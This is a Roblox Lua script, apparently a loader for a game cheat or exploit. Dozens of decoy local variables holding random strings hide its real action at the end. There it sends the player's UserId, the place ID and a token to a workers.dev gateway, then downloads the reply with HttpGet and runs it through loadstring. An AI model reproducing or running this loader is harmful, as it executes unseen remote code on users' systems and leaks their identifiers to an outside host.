local skdgalgxv = "renfl8ek7bds"
local kmmmxjous = "58osvs1r1rv97"
local faqomlcmljtjgt = "1t2d4vsijh5tjqzxdm"
local dxpbxsncllqbe = "2qb3vu4fk5xda1fh"
local ilcyygusmca = "fw5zfwj37qgba"
local xflryxwyxv = "feovspevcob9"
local vqwnditguihz = "7kw9nsfhmrfrijmpua"
local sqvechzvviyv = "qxbwettffcn1"
local qtzdfthbbw = "f2awsznkieeu1jc2"
local rdneawuwfipm = "qj85qf3t3otzxlsmi7"
local cggrbfbsnkavb = "1jd48jp7kt81r3blg7"
if _G["hiii"] ~= true then return end
local psylgdhzxgyhc = "mtd5t63c8dml"
local sskldcab = "dae6ditlr8yx"
local dyzmaihx = "s1shcgbbpk0eyavlr"
local almmkbervt = "gm2soo8huqjr"
local snqyganrywlgzj = "ghuj6m179a"
local katxdahenkzvs = "k19n5slzxvl64v4el"
local iqosyipdy = "vf79lsp88mz0tu"
local wwavtwxdyfkl = "p081lvho5gg"
local ankizzsi = "7k6frcqtykexn1k2"
local pccfbfapuo = "mlf820tlvtjvxhtjio"
local bdiwnbnu = "aoqyns1g3k50b2snw9"
_G["dcxkvere"] = "16y89l12dc9dfeuwsmmrz"
_G["__ls_reached_redirect"] = true
local vvjvcwco = "i03eynthiu6dt"
local oufincdxo = "qv2cwfncijnph3w6j"
local ufrhzepmbo = "xrolez6901cl"
local zrriqnvjyvf = "ohgps70zg0"
local hnkgepuo = "47w95egr3n"
local nzvowfkxbs = "i2m4e0zpysxrga0k"
local ypptsmjtvtv = "7p3uo2btp5o5hb3hh"
local bisjufyjvwzac = "acmsplrzrv7hle"
local qtcihswfoqjl = "pxgod5i4j23tomm"
local knnhhfqumhrxdi = "jf2yl1c2bq79g96m"
local aqsntscb = "evse8edijm5"
local vpohtklthp = "e7i5h8f3xrynwk5v"
local fnhtphazvpp = "xke35sfxm64n4dz5ay"
local bivxnewq = "1setw4rue1pnxc"
_G["iobmxdzu"] = auth
local xcwicdey = tostring(game:GetService("Players").LocalPlayer.UserId)
local hdmqqppsysaetr = tostring(game.PlaceId)
local fztutmvcomt = "https://lazybear-gateway.iusemaybehook.workers.dev/?file=lazybear0340_hrlo.lua&token=3gzm_V77RWzSRpv8Iw0O6IS8mk1xpHY9vN-grj60N0M&ck=" .. bivxnewq .. "&sv=16y89l12dc9dfeuwsmmrz&uid=" .. xcwicdey .. "&pid=" .. hdmqqppsysaetr
local prbdhyfwfh = game:HttpGet(fztutmvcomt, true)
loadstring(prbdhyfwfh)()
_G["iobmxdzu"] = nil
